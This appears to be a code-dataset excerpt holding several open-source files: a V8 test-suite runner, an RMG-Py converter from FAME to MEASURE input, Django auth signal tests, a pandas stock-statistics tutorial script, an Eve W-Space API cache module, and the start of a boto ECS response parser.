repo_name stringlengths 6 100 | path stringlengths 4 294 | copies stringlengths 1 5 | size stringlengths 4 6 | content stringlengths 606 896k | license stringclasses 15
values |
|---|---|---|---|---|---|
weolar/miniblink49 | v8_5_1/tools/testrunner/local/testsuite.py | 6 | 11182 | # Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import os
from . import commands
from . import statusfile
from . import utils
from ..objects import testcase
# Use this to run several variants of the tests.
ALL_VARIANT_FLAGS = {
"default": [[]],
"stress": [["--stress-opt", "--always-opt"]],
"turbofan": [["--turbo"]],
"turbofan_opt": [["--turbo", "--always-opt"]],
"nocrankshaft": [["--nocrankshaft"]],
"ignition": [["--ignition", "--turbo"]],
"preparser": [["--min-preparse-length=0"]],
}
# FAST_VARIANTS implies no --always-opt.
FAST_VARIANT_FLAGS = {
"default": [[]],
"stress": [["--stress-opt"]],
"turbofan": [["--turbo"]],
"nocrankshaft": [["--nocrankshaft"]],
"ignition": [["--ignition", "--turbo"]],
"preparser": [["--min-preparse-length=0"]],
}
ALL_VARIANTS = set(["default", "stress", "turbofan", "turbofan_opt",
"nocrankshaft", "ignition", "preparser"])
FAST_VARIANTS = set(["default", "turbofan"])
STANDARD_VARIANT = set(["default"])
class VariantGenerator(object):
def __init__(self, suite, variants):
self.suite = suite
self.all_variants = ALL_VARIANTS & variants
self.fast_variants = FAST_VARIANTS & variants
self.standard_variant = STANDARD_VARIANT & variants
def FilterVariantsByTest(self, testcase):
if testcase.outcomes and statusfile.OnlyStandardVariant(
testcase.outcomes):
return self.standard_variant
if testcase.outcomes and statusfile.OnlyFastVariants(testcase.outcomes):
return self.fast_variants
return self.all_variants
def GetFlagSets(self, testcase, variant):
if testcase.outcomes and statusfile.OnlyFastVariants(testcase.outcomes):
return FAST_VARIANT_FLAGS[variant]
else:
return ALL_VARIANT_FLAGS[variant]
class TestSuite(object):
@staticmethod
def LoadTestSuite(root, global_init=True):
name = root.split(os.path.sep)[-1]
f = None
try:
(f, pathname, description) = imp.find_module("testcfg", [root])
module = imp.load_module("testcfg", f, pathname, description)
return module.GetSuite(name, root)
except ImportError:
# Use default if no testcfg is present.
return GoogleTestSuite(name, root)
finally:
if f:
f.close()
def __init__(self, name, root):
# Note: This might be called concurrently from different processes.
self.name = name # string
self.root = root # string containing path
self.tests = None # list of TestCase objects
self.rules = None # dictionary mapping test path to list of outcomes
self.wildcards = None # dictionary mapping test paths to list of outcomes
self.total_duration = None # float, assigned on demand
def shell(self):
return "d8"
def suffix(self):
return ".js"
def status_file(self):
return "%s/%s.status" % (self.root, self.name)
# Used in the status file and for stdout printing.
def CommonTestName(self, testcase):
if utils.IsWindows():
return testcase.path.replace("\\", "/")
else:
return testcase.path
def ListTests(self, context):
raise NotImplementedError
def _VariantGeneratorFactory(self):
"""The variant generator class to be used."""
return VariantGenerator
def CreateVariantGenerator(self, variants):
"""Return a generator for the testing variants of this suite.
Args:
variants: List of variant names to be run as specified by the test
runner.
Returns: An object of type VariantGenerator.
"""
return self._VariantGeneratorFactory()(self, set(variants))
def DownloadData(self):
pass
def ReadStatusFile(self, variables):
(self.rules, self.wildcards) = \
statusfile.ReadStatusFile(self.status_file(), variables)
def ReadTestCases(self, context):
self.tests = self.ListTests(context)
@staticmethod
def _FilterSlow(slow, mode):
return (mode == "run" and not slow) or (mode == "skip" and slow)
@staticmethod
def _FilterPassFail(pass_fail, mode):
return (mode == "run" and not pass_fail) or (mode == "skip" and pass_fail)
def FilterTestCasesByStatus(self, warn_unused_rules,
slow_tests="dontcare",
pass_fail_tests="dontcare"):
filtered = []
used_rules = set()
for t in self.tests:
slow = False
pass_fail = False
testname = self.CommonTestName(t)
if testname in self.rules:
used_rules.add(testname)
# Even for skipped tests, as the TestCase object stays around and
# PrintReport() uses it.
t.outcomes = self.rules[testname]
if statusfile.DoSkip(t.outcomes):
continue # Don't add skipped tests to |filtered|.
for outcome in t.outcomes:
if outcome.startswith('Flags: '):
t.flags += outcome[7:].split()
slow = statusfile.IsSlow(t.outcomes)
pass_fail = statusfile.IsPassOrFail(t.outcomes)
skip = False
for rule in self.wildcards:
assert rule[-1] == '*'
if testname.startswith(rule[:-1]):
used_rules.add(rule)
t.outcomes |= self.wildcards[rule]
if statusfile.DoSkip(t.outcomes):
skip = True
break # "for rule in self.wildcards"
slow = slow or statusfile.IsSlow(t.outcomes)
pass_fail = pass_fail or statusfile.IsPassOrFail(t.outcomes)
if (skip
or self._FilterSlow(slow, slow_tests)
or self._FilterPassFail(pass_fail, pass_fail_tests)):
continue # "for t in self.tests"
filtered.append(t)
self.tests = filtered
if not warn_unused_rules:
return
for rule in self.rules:
if rule not in used_rules:
print("Unused rule: %s -> %s" % (rule, self.rules[rule]))
for rule in self.wildcards:
if rule not in used_rules:
print("Unused rule: %s -> %s" % (rule, self.wildcards[rule]))
def FilterTestCasesByArgs(self, args):
"""Filter test cases based on command-line arguments.
An argument with an asterisk in the end will match all test cases
that have the argument as a prefix. Without asterisk, only exact matches
will be used with the exeption of the test-suite name as argument.
"""
filtered = []
globs = []
exact_matches = []
for a in args:
argpath = a.split('/')
if argpath[0] != self.name:
continue
if len(argpath) == 1 or (len(argpath) == 2 and argpath[1] == '*'):
return # Don't filter, run all tests in this suite.
path = '/'.join(argpath[1:])
if path[-1] == '*':
path = path[:-1]
globs.append(path)
else:
exact_matches.append(path)
for t in self.tests:
for a in globs:
if t.path.startswith(a):
filtered.append(t)
break
for a in exact_matches:
if t.path == a:
filtered.append(t)
break
self.tests = filtered
def GetFlagsForTestCase(self, testcase, context):
raise NotImplementedError
def GetSourceForTest(self, testcase):
return "(no source available)"
def IsFailureOutput(self, testcase):
return testcase.output.exit_code != 0
def IsNegativeTest(self, testcase):
return False
def HasFailed(self, testcase):
execution_failed = self.IsFailureOutput(testcase)
if self.IsNegativeTest(testcase):
return not execution_failed
else:
return execution_failed
def GetOutcome(self, testcase):
if testcase.output.HasCrashed():
return statusfile.CRASH
elif testcase.output.HasTimedOut():
return statusfile.TIMEOUT
elif self.HasFailed(testcase):
return statusfile.FAIL
else:
return statusfile.PASS
def HasUnexpectedOutput(self, testcase):
outcome = self.GetOutcome(testcase)
return not outcome in (testcase.outcomes or [statusfile.PASS])
def StripOutputForTransmit(self, testcase):
if not self.HasUnexpectedOutput(testcase):
testcase.output.stdout = ""
testcase.output.stderr = ""
def CalculateTotalDuration(self):
self.total_duration = 0.0
for t in self.tests:
self.total_duration += t.duration
return self.total_duration
class StandardVariantGenerator(VariantGenerator):
def FilterVariantsByTest(self, testcase):
return self.standard_variant
class GoogleTestSuite(TestSuite):
def __init__(self, name, root):
super(GoogleTestSuite, self).__init__(name, root)
def ListTests(self, context):
shell = os.path.abspath(os.path.join(context.shell_dir, self.shell()))
if utils.IsWindows():
shell += ".exe"
output = commands.Execute(context.command_prefix +
[shell, "--gtest_list_tests"] +
context.extra_flags)
if output.exit_code != 0:
print output.stdout
print output.stderr
raise Exception("Test executable failed to list the tests.")
tests = []
test_case = ''
for line in output.stdout.splitlines():
test_desc = line.strip().split()[0]
if test_desc.endswith('.'):
test_case = test_desc
elif test_case and test_desc:
test = testcase.TestCase(self, test_case + test_desc)
tests.append(test)
tests.sort(key=lambda t: t.path)
return tests
def GetFlagsForTestCase(self, testcase, context):
return (testcase.flags + ["--gtest_filter=" + testcase.path] +
["--gtest_random_seed=%s" % context.random_seed] +
["--gtest_print_time=0"] +
context.mode_flags)
def _VariantGeneratorFactory(self):
return StandardVariantGenerator
def shell(self):
return self.name
| apache-2.0 |
comocheng/RMG-Py | convertFAME.py | 4 | 18608 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Convert a FAME input file to a MEASURE input file.
"""
import argparse
import logging
import numpy
import os.path
from rmgpy.molecule import Molecule
import rmgpy.constants as constants
from rmgpy.quantity import Quantity, Energy
from rmgpy.cantherm.main import CanTherm
from rmgpy.cantherm.pdep import PressureDependenceJob
from rmgpy.pdep import Network, Configuration, SingleExponentialDown
from rmgpy.species import Species, TransitionState
from rmgpy.reaction import Reaction
from rmgpy.transport import TransportData
from rmgpy.statmech import HarmonicOscillator, HinderedRotor, Conformer
from rmgpy.thermo import ThermoData
from rmgpy.kinetics import Arrhenius
################################################################################
def parseCommandLineArguments():
"""
Parse the command-line arguments being passed to MEASURE. These are
described in the module docstring.
"""
parser = argparse.ArgumentParser()
parser.add_argument('file', metavar='FILE', type=str, nargs='+',
help='a file to convert')
parser.add_argument('-d', '--dictionary', metavar='DICTFILE', type=str, nargs=1,
help='the RMG dictionary corresponding to these files')
parser.add_argument('-x', '--max-energy', metavar='VALUE UNITS', type=str, nargs=2,
help='A maximum energy to crop at')
return parser.parse_args()
################################################################################
def loadFAMEInput(path, moleculeDict=None):
"""
Load the contents of a FAME input file into the MEASURE object. FAME
is an early version of MEASURE written in Fortran and used by RMG-Java.
This script enables importing FAME input files into MEASURE so we can
use the additional functionality that MEASURE provides. Note that it
is mostly designed to load the FAME input files generated automatically
by RMG-Java, and may not load hand-crafted FAME input files. If you
specify a `moleculeDict`, then this script will use it to associate
the species with their structures.
"""
def readMeaningfulLine(f):
line = f.readline()
while line != '':
line = line.strip()
if len(line) > 0 and line[0] != '#':
return line
else:
line = f.readline()
return ''
moleculeDict = moleculeDict or {}
logging.info('Loading file "{0}"...'.format(path))
f = open(path)
job = PressureDependenceJob(network=None)
# Read method
method = readMeaningfulLine(f).lower()
if method == 'modifiedstrongcollision':
job.method = 'modified strong collision'
elif method == 'reservoirstate':
job.method = 'reservoir state'
# Read temperatures
Tcount, Tunits, Tmin, Tmax = readMeaningfulLine(f).split()
job.Tmin = Quantity(float(Tmin), Tunits)
job.Tmax = Quantity(float(Tmax), Tunits)
job.Tcount = int(Tcount)
Tlist = []
for i in range(int(Tcount)):
Tlist.append(float(readMeaningfulLine(f)))
job.Tlist = Quantity(Tlist, Tunits)
# Read pressures
Pcount, Punits, Pmin, Pmax = readMeaningfulLine(f).split()
job.Pmin = Quantity(float(Pmin), Punits)
job.Pmax = Quantity(float(Pmax), Punits)
job.Pcount = int(Pcount)
Plist = []
for i in range(int(Pcount)):
Plist.append(float(readMeaningfulLine(f)))
job.Plist = Quantity(Plist, Punits)
# Read interpolation model
model = readMeaningfulLine(f).split()
if model[0].lower() == 'chebyshev':
job.interpolationModel = ('chebyshev', int(model[1]), int(model[2]))
elif model[0].lower() == 'pdeparrhenius':
job.interpolationModel = ('pdeparrhenius',)
# Read grain size or number of grains
job.minimumGrainCount = 0
job.maximumGrainSize = None
for i in range(2):
data = readMeaningfulLine(f).split()
if data[0].lower() == 'numgrains':
job.minimumGrainCount = int(data[1])
elif data[0].lower() == 'grainsize':
job.maximumGrainSize = (float(data[2]), data[1])
# A FAME file is almost certainly created during an RMG job, so use RMG mode
job.rmgmode = True
# Create the Network
job.network = Network()
# Read collision model
data = readMeaningfulLine(f)
assert data.lower() == 'singleexpdown'
alpha0units, alpha0 = readMeaningfulLine(f).split()
T0units, T0 = readMeaningfulLine(f).split()
n = readMeaningfulLine(f)
energyTransferModel = SingleExponentialDown(
alpha0 = Quantity(float(alpha0), alpha0units),
T0 = Quantity(float(T0), T0units),
n = float(n),
)
speciesDict = {}
# Read bath gas parameters
bathGas = Species(label='bath_gas', energyTransferModel=energyTransferModel)
molWtunits, molWt = readMeaningfulLine(f).split()
if molWtunits == 'u': molWtunits = 'amu'
bathGas.molecularWeight = Quantity(float(molWt), molWtunits)
sigmaLJunits, sigmaLJ = readMeaningfulLine(f).split()
epsilonLJunits, epsilonLJ = readMeaningfulLine(f).split()
assert epsilonLJunits == 'J'
bathGas.transportData = TransportData(
sigma = Quantity(float(sigmaLJ), sigmaLJunits),
epsilon = Quantity(float(epsilonLJ) / constants.kB, 'K'),
)
job.network.bathGas = {bathGas: 1.0}
# Read species data
Nspec = int(readMeaningfulLine(f))
for i in range(Nspec):
species = Species()
species.conformer = Conformer()
species.energyTransferModel = energyTransferModel
# Read species label
species.label = readMeaningfulLine(f)
speciesDict[species.label] = species
if species.label in moleculeDict:
species.molecule = [moleculeDict[species.label]]
# Read species E0
E0units, E0 = readMeaningfulLine(f).split()
species.conformer.E0 = Quantity(float(E0), E0units)
species.conformer.E0.units = 'kJ/mol'
# Read species thermo data
H298units, H298 = readMeaningfulLine(f).split()
S298units, S298 = readMeaningfulLine(f).split()
Cpcount, Cpunits = readMeaningfulLine(f).split()
Cpdata = []
for i in range(int(Cpcount)):
Cpdata.append(float(readMeaningfulLine(f)))
if S298units == 'J/mol*K': S298units = 'J/(mol*K)'
if Cpunits == 'J/mol*K': Cpunits = 'J/(mol*K)'
species.thermo = ThermoData(
H298 = Quantity(float(H298), H298units),
S298 = Quantity(float(S298), S298units),
Tdata = Quantity([300,400,500,600,800,1000,1500], "K"),
Cpdata = Quantity(Cpdata, Cpunits),
Cp0 = (Cpdata[0], Cpunits),
CpInf = (Cpdata[-1], Cpunits),
)
# Read species collision parameters
molWtunits, molWt = readMeaningfulLine(f).split()
if molWtunits == 'u': molWtunits = 'amu'
species.molecularWeight = Quantity(float(molWt), molWtunits)
sigmaLJunits, sigmaLJ = readMeaningfulLine(f).split()
epsilonLJunits, epsilonLJ = readMeaningfulLine(f).split()
assert epsilonLJunits == 'J'
species.transportData = TransportData(
sigma = Quantity(float(sigmaLJ), sigmaLJunits),
epsilon = Quantity(float(epsilonLJ) / constants.kB, 'K'),
)
# Read species vibrational frequencies
freqCount, freqUnits = readMeaningfulLine(f).split()
frequencies = []
for j in range(int(freqCount)):
frequencies.append(float(readMeaningfulLine(f)))
species.conformer.modes.append(HarmonicOscillator(
frequencies = Quantity(frequencies, freqUnits),
))
# Read species external rotors
rotCount, rotUnits = readMeaningfulLine(f).split()
if int(rotCount) > 0:
raise NotImplementedError('Cannot handle external rotational modes in FAME input.')
# Read species internal rotors
freqCount, freqUnits = readMeaningfulLine(f).split()
frequencies = []
for j in range(int(freqCount)):
frequencies.append(float(readMeaningfulLine(f)))
barrCount, barrUnits = readMeaningfulLine(f).split()
barriers = []
for j in range(int(barrCount)):
barriers.append(float(readMeaningfulLine(f)))
if barrUnits == 'cm^-1':
barrUnits = 'J/mol'
barriers = [barr * constants.h * constants.c * constants.Na * 100. for barr in barriers]
elif barrUnits in ['Hz', 's^-1']:
barrUnits = 'J/mol'
barriers = [barr * constants.h * constants.Na for barr in barriers]
elif barrUnits != 'J/mol':
raise Exception('Unexpected units "{0}" for hindered rotor barrier height.'.format(barrUnits))
inertia = [V0 / 2.0 / (nu * constants.c * 100.)**2 / constants.Na for nu, V0 in zip(frequencies, barriers)]
for I, V0 in zip(inertia, barriers):
species.conformer.modes.append(HinderedRotor(
inertia = Quantity(I,"kg*m^2"),
barrier = Quantity(V0,barrUnits),
symmetry = 1,
semiclassical = False,
))
# Read overall symmetry number
species.conformer.spinMultiplicity = int(readMeaningfulLine(f))
# Read isomer, reactant channel, and product channel data
Nisom = int(readMeaningfulLine(f))
Nreac = int(readMeaningfulLine(f))
Nprod = int(readMeaningfulLine(f))
for i in range(Nisom):
data = readMeaningfulLine(f).split()
assert data[0] == '1'
job.network.isomers.append(speciesDict[data[1]])
for i in range(Nreac):
data = readMeaningfulLine(f).split()
assert data[0] == '2'
job.network.reactants.append([speciesDict[data[1]], speciesDict[data[2]]])
for i in range(Nprod):
data = readMeaningfulLine(f).split()
if data[0] == '1':
job.network.products.append([speciesDict[data[1]]])
elif data[0] == '2':
job.network.products.append([speciesDict[data[1]], speciesDict[data[2]]])
# Read path reactions
Nrxn = int(readMeaningfulLine(f))
for i in range(Nrxn):
# Read and ignore reaction equation
equation = readMeaningfulLine(f)
reaction = Reaction(transitionState=TransitionState(), reversible=True)
job.network.pathReactions.append(reaction)
reaction.transitionState.conformer = Conformer()
# Read reactant and product indices
data = readMeaningfulLine(f).split()
reac = int(data[0]) - 1
prod = int(data[1]) - 1
if reac < Nisom:
reaction.reactants = [job.network.isomers[reac]]
elif reac < Nisom+Nreac:
reaction.reactants = job.network.reactants[reac-Nisom]
else:
reaction.reactants = job.network.products[reac-Nisom-Nreac]
if prod < Nisom:
reaction.products = [job.network.isomers[prod]]
elif prod < Nisom+Nreac:
reaction.products = job.network.reactants[prod-Nisom]
else:
reaction.products = job.network.products[prod-Nisom-Nreac]
# Read reaction E0
E0units, E0 = readMeaningfulLine(f).split()
reaction.transitionState.conformer.E0 = Quantity(float(E0), E0units)
reaction.transitionState.conformer.E0.units = 'kJ/mol'
# Read high-pressure limit kinetics
data = readMeaningfulLine(f)
assert data.lower() == 'arrhenius'
Aunits, A = readMeaningfulLine(f).split()
if '/' in Aunits:
index = Aunits.find('/')
Aunits = '{0}/({1})'.format(Aunits[0:index], Aunits[index+1:])
Eaunits, Ea = readMeaningfulLine(f).split()
n = readMeaningfulLine(f)
reaction.kinetics = Arrhenius(
A = Quantity(float(A), Aunits),
Ea = Quantity(float(Ea), Eaunits),
n = Quantity(float(n)),
)
reaction.kinetics.Ea.units = 'kJ/mol'
f.close()
job.network.isomers = [Configuration(isomer) for isomer in job.network.isomers]
job.network.reactants = [Configuration(*reactants) for reactants in job.network.reactants]
job.network.products = [Configuration(*products) for products in job.network.products]
return job
def pruneNetwork(network, Emax):
"""
Prune the network by removing any configurations with ground-state energy
above `Emax` in J/mol and any reactions with transition state energy above
`Emax` from the network. All reactions involving removed configurations
are also removed. Any configurations that have zero reactions as a result
of this process are also removed.
"""
# Remove configurations with ground-state energies above the given Emax
isomersToRemove = []
for isomer in network.isomers:
if isomer.E0 > Emax:
isomersToRemove.append(isomer)
for isomer in isomersToRemove:
network.isomers.remove(isomer)
reactantsToRemove = []
for reactant in network.reactants:
if reactant.E0 > Emax:
reactantsToRemove.append(reactant)
for reactant in reactantsToRemove:
network.reactants.remove(reactant)
productsToRemove = []
for product in network.products:
if product.E0 > Emax:
productsToRemove.append(product)
for product in productsToRemove:
network.products.remove(product)
# Remove path reactions involving the removed configurations
removedConfigurations = []
removedConfigurations.extend([isomer.species for isomer in isomersToRemove])
removedConfigurations.extend([reactant.species for reactant in reactantsToRemove])
removedConfigurations .extend([product.species for product in productsToRemove])
reactionsToRemove = []
for rxn in network.pathReactions:
if rxn.reactants in removedConfigurations or rxn.products in removedConfigurations:
reactionsToRemove.append(rxn)
for rxn in reactionsToRemove:
network.pathReactions.remove(rxn)
# Remove path reactions with barrier heights above the given Emax
reactionsToRemove = []
for rxn in network.pathReactions:
if rxn.transitionState.conformer.E0.value_si > Emax:
reactionsToRemove.append(rxn)
for rxn in reactionsToRemove:
network.pathReactions.remove(rxn)
def ismatch(speciesList1, speciesList2):
if len(speciesList1) == len(speciesList2) == 1:
return (speciesList1[0] is speciesList2[0])
elif len(speciesList1) == len(speciesList2) == 2:
return ((speciesList1[0] is speciesList2[0] and speciesList1[1] is speciesList2[1]) or
(speciesList1[0] is speciesList2[1] and speciesList1[1] is speciesList2[0]))
elif len(speciesList1) == len(speciesList2) == 3:
return ((speciesList1[0] is speciesList2[0] and speciesList1[1] is speciesList2[1] and speciesList1[2] is speciesList2[2]) or
(speciesList1[0] is speciesList2[0] and speciesList1[1] is speciesList2[2] and speciesList1[2] is speciesList2[1]) or
(speciesList1[0] is speciesList2[1] and speciesList1[1] is speciesList2[0] and speciesList1[2] is speciesList2[2]) or
(speciesList1[0] is speciesList2[1] and speciesList1[1] is speciesList2[2] and speciesList1[2] is speciesList2[0]) or
(speciesList1[0] is speciesList2[2] and speciesList1[1] is speciesList2[0] and speciesList1[2] is speciesList2[1]) or
(speciesList1[0] is speciesList2[2] and speciesList1[1] is speciesList2[1] and speciesList1[2] is speciesList2[0]))
else:
return False
# Remove orphaned configurations (those with zero path reactions involving them)
isomersToRemove = []
for isomer in network.isomers:
for rxn in network.pathReactions:
if ismatch(rxn.reactants, isomer.species) or ismatch(rxn.products, isomer.species):
break
else:
isomersToRemove.append(isomer)
for isomer in isomersToRemove:
network.isomers.remove(isomer)
reactantsToRemove = []
for reactant in network.reactants:
for rxn in network.pathReactions:
if ismatch(rxn.reactants, reactant.species) or ismatch(rxn.products, reactant.species):
break
else:
reactantsToRemove.append(reactant)
for reactant in reactantsToRemove:
network.reactants.remove(reactant)
productsToRemove = []
for product in network.products:
for rxn in network.pathReactions:
if ismatch(rxn.reactants, product.species) or ismatch(rxn.products, product.species):
break
else:
productsToRemove.append(product)
for product in productsToRemove:
network.products.remove(product)
################################################################################
if __name__ == '__main__':
# Parse the command-line arguments
args = parseCommandLineArguments()
if args.max_energy:
Emax = float(args.max_energy[0])
Eunits = str(args.max_energy[1])
Emax = Energy(Emax, Eunits).value_si
else:
Emax = None
# Load RMG dictionary if specified
moleculeDict = {}
if args.dictionary is not None:
f = open(args.dictionary[0])
adjlist = ''; label = ''
for line in f:
if len(line.strip()) == 0:
if len(adjlist.strip()) > 0:
molecule = Molecule()
molecule.fromAdjacencyList(adjlist)
moleculeDict[label] = molecule
adjlist = ''; label = ''
else:
if len(adjlist.strip()) == 0:
label = line.strip()
adjlist += line
f.close()
method = None
for fstr in args.file:
# Construct CanTherm job from FAME input
job = loadFAMEInput(fstr, moleculeDict)
if Emax is not None:
pruneNetwork(job.network, Emax)
# Save MEASURE input file based on the above
dirname, basename = os.path.split(os.path.abspath(fstr))
basename, ext = os.path.splitext(basename)
path = os.path.join(dirname, basename + '.py')
job.saveInputFile(path)
| mit |
whs/django | tests/auth_tests/test_signals.py | 9 | 4459 | from django.apps import apps
from django.contrib.auth import authenticate, signals
from django.contrib.auth.models import User
from django.core.exceptions import FieldDoesNotExist
from django.test import TestCase, override_settings
from django.test.client import RequestFactory
from .models import MinimalUser
@override_settings(ROOT_URLCONF='auth_tests.urls')
class SignalTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.u1 = User.objects.create_user(username='testclient', password='password')
cls.u3 = User.objects.create_user(username='staff', password='password')
def listener_login(self, user, **kwargs):
self.logged_in.append(user)
def listener_logout(self, user, **kwargs):
self.logged_out.append(user)
def listener_login_failed(self, sender, **kwargs):
self.login_failed.append(kwargs)
def setUp(self):
"""Set up the listeners and reset the logged in/logged out counters"""
self.logged_in = []
self.logged_out = []
self.login_failed = []
signals.user_logged_in.connect(self.listener_login)
signals.user_logged_out.connect(self.listener_logout)
signals.user_login_failed.connect(self.listener_login_failed)
def tearDown(self):
"""Disconnect the listeners"""
signals.user_logged_in.disconnect(self.listener_login)
signals.user_logged_out.disconnect(self.listener_logout)
signals.user_login_failed.disconnect(self.listener_login_failed)
def test_login(self):
# Only a successful login will trigger the success signal.
self.client.login(username='testclient', password='bad')
self.assertEqual(len(self.logged_in), 0)
self.assertEqual(len(self.login_failed), 1)
self.assertEqual(self.login_failed[0]['credentials']['username'], 'testclient')
# verify the password is cleansed
self.assertIn('***', self.login_failed[0]['credentials']['password'])
self.assertIn('request', self.login_failed[0])
# Like this:
self.client.login(username='testclient', password='password')
self.assertEqual(len(self.logged_in), 1)
self.assertEqual(self.logged_in[0].username, 'testclient')
# Ensure there were no more failures.
self.assertEqual(len(self.login_failed), 1)
def test_logout_anonymous(self):
# The log_out function will still trigger the signal for anonymous
# users.
self.client.get('/logout/next_page/')
self.assertEqual(len(self.logged_out), 1)
self.assertIsNone(self.logged_out[0])
def test_logout(self):
self.client.login(username='testclient', password='password')
self.client.get('/logout/next_page/')
self.assertEqual(len(self.logged_out), 1)
self.assertEqual(self.logged_out[0].username, 'testclient')
def test_update_last_login(self):
"""Only `last_login` is updated in `update_last_login`"""
user = self.u3
old_last_login = user.last_login
user.username = "This username shouldn't get saved"
request = RequestFactory().get('/login')
signals.user_logged_in.send(sender=user.__class__, request=request, user=user)
user.refresh_from_db()
self.assertEqual(user.username, 'staff')
self.assertNotEqual(user.last_login, old_last_login)
def test_failed_login_without_request(self):
authenticate(username='testclient', password='bad')
self.assertIsNone(self.login_failed[0]['request'])
def test_login_with_custom_user_without_last_login_field(self):
"""
The user_logged_in signal is only registered if the user model has a
last_login field.
"""
last_login_receivers = signals.user_logged_in.receivers
try:
signals.user_logged_in.receivers = []
with self.assertRaises(FieldDoesNotExist):
MinimalUser._meta.get_field('last_login')
with self.settings(AUTH_USER_MODEL='auth_tests.MinimalUser'):
apps.get_app_config('auth').ready()
self.assertEqual(signals.user_logged_in.receivers, [])
with self.settings(AUTH_USER_MODEL='auth.User'):
apps.get_app_config('auth').ready()
self.assertEqual(len(signals.user_logged_in.receivers), 1)
finally:
signals.user_logged_in.receivers = last_login_receivers
| bsd-3-clause |
cleesmith/sentdex_scikit_machine_learning_tutorial_for_investing | p06.py | 2 | 1516 | import pandas as pd
import os
import time
from datetime import datetime
# path = "X:/Backups/intraQuarter" # for Windows with X files :)
# if git clone'ed then use relative path,
# assuming you extracted the downloaded zip into this project's folder:
path = "intraQuarter"
def Key_Stats(gather="Total Debt/Equity (mrq)"):
statspath = path+'/_KeyStats'
stock_list = [x[0] for x in os.walk(statspath)]
df = pd.DataFrame(columns = ['Date','Unix','Ticker','DE Ratio'])
for each_dir in stock_list[1:]:
each_file = os.listdir(each_dir)
# ticker = each_dir.split("\\")[1] # Windows only
# ticker = each_dir.split("/")[1] # this didn't work so do this:
ticker = os.path.basename(os.path.normpath(each_dir))
# print(ticker) # uncomment to verify
if len(each_file) > 0:
for file in each_file:
date_stamp = datetime.strptime(file, '%Y%m%d%H%M%S.html')
unix_time = time.mktime(date_stamp.timetuple())
full_file_path = each_dir+'/'+file
source = open(full_file_path,'r').read()
try:
value = float(source.split(gather+':</td><td class="yfnc_tabledata1">')[1].split('</td>')[0])
# print("value=%s"%value) # uncomment to see what's up
df = df.append({'Date':date_stamp,'Unix':unix_time,'Ticker':ticker,'DE Ratio':value,}, ignore_index = True)
except Exception as e:
pass
save = gather.replace(' ','').replace(')','').replace('(','').replace('/','')+('.csv')
print(save)
df.to_csv(save)
Key_Stats() | mit |
nyrocron/eve-wspace | evewspace/API/cache_handler.py | 10 | 1496 | # Eve W-Space
# Copyright 2014 Andrew Austin and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.core.cache import cache
from datetime import datetime
import cPickle as pickle
import time
import zlib
import pytz
def store(host, path, params, doc, obj):
"""Store an API document in our cache."""
#First remove any outdated versions of the document.
cacheKey = "%s%s%s" %(host, path, params)
cacheTimer = obj.cachedUntil - int(time.time())
# If cacheTimer is negative or 0 (due to server clock inaccuracy)
# We will set a default cache timer of 60 seconds
if cacheTimer <= 0:
cacheTimer = 60
cache.set(hash(cacheKey), zlib.compress(unicode(doc)), cacheTimer)
def retrieve(host, path, params):
"""Get an API document from our cache."""
cacheKey = "%s%s%s" % (host, path, params)
if cache.get(hash(cacheKey)):
return zlib.decompress(cache.get(hash(cacheKey)))
else:
return None
| apache-2.0 |
liaorubei/depot_tools | third_party/boto/ecs/item.py | 89 | 5148 | # Copyright (c) 2010 Chris Moyer http://coredumped.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import xml.sax
import cgi
from StringIO import StringIO
class ResponseGroup(xml.sax.ContentHandler):
"""A Generic "Response Group", which can
be anything from the entire list of Items to
